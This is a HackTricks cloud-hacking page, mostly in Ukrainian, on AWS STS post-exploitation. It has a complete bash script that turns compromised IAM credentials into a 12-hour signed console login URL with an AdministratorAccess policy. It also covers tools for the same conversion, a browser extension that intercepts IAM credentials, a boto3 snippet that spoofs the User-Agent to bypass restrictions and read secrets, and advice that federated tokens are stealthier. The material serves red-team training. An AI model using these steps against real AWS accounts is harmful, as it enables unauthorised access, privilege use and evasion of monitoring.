AWS - STS Post Exploitation

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримка HackTricks

STS

For more information:

AWS - IAM, Identity Center & SSO Enum

Від IAM Creds до Console

Якщо вам вдалося отримати деякі IAM credentials, вас може зацікавити доступ до web console за допомогою наступних інструментів.
Зверніть увагу, що користувач/роль повинні мати дозвіл sts:GetFederationToken.

Користувацький скрипт

Наведений скрипт використовуватиме default profile та стандартний AWS регіон (не gov і не cn), щоб надати вам підписаний URL, який ви можете використати для входу у web console:

# Get federated creds (you must indicate a policy or they won't have any perms)
## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
## Don't forget to use [--profile <prof_name>] in the first line if you need to
output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)

if [ $? -ne 0 ]; then
echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
exit $status
fi

# Parse the output
session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
session_token=$(echo $output | jq -r '.Credentials.SessionToken')

# Construct the JSON credentials string
json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")

# Define the AWS federation endpoint
federation_endpoint="https://signin.aws.amazon.com/federation"

# Make the HTTP request to get the sign-in token
resp=$(curl -s "$federation_endpoint" \
--get \
--data-urlencode "Action=getSigninToken" \
--data-urlencode "SessionDuration=43200" \
--data-urlencode "Session=$json_creds"
)
signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)


# Give the URL to login
echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"

aws_consoler

Ви можете згенерувати посилання на веб-консоль за допомогою https://github.com/NetSPI/aws_consoler.

cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login into the console

Warning

Переконайтеся, що користувач IAM має дозвіл sts:GetFederationToken, або надайте роль, яку можна прийняти.

aws-vault

aws-vault є інструментом для безпечного зберігання та доступу до облікових даних AWS у середовищі розробки.

aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith

Note

Ви також можете використовувати aws-vault для отримання сесії веб-консолі

З Web Console до IAM Creds

Розширення браузера https://github.com/AI-redteam/clier може перехоплювати IAM credentials із мережі до того, як вони будуть захищені в пам’яті браузера.

Обхід обмежень User-Agent з Python

Якщо існує обмеження на виконання певних дій залежно від використаного user agent (наприклад, обмеження використання бібліотеки python boto3 за user agent), можна використати попередню техніку, щоб підключитися до web console через браузер, або безпосередньо змінити boto3 user-agent, зробивши:

# Shared by ex16x41
# Create a client
session = boto3.Session(profile_name="lab6")
client = session.client("secretsmanager", region_name="us-east-1")

# Change user agent of the client
client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'}) )

# Perform the action
response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])

sts:GetFederationToken

З цим дозволом можна створити федеративну ідентичність для користувача, який його використовує, обмежену тими ж дозволами, що має цей користувач.

aws sts get-federation-token --name <username>

Токен, який повертає sts:GetFederationToken, належить федеративній ідентичності користувача, який робить запит, але має обмежені права. Навіть якщо користувач має права адміністратора, певні дії, такі як перелік IAM користувачів або прикріплення політик, не можуть виконуватися через федеративний токен.

Крім того, цей метод дещо більш малопомітний, оскільки федеративний користувач не відображається в AWS Portal — його можна побачити лише через логи CloudTrail або засоби моніторингу.

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримка HackTricks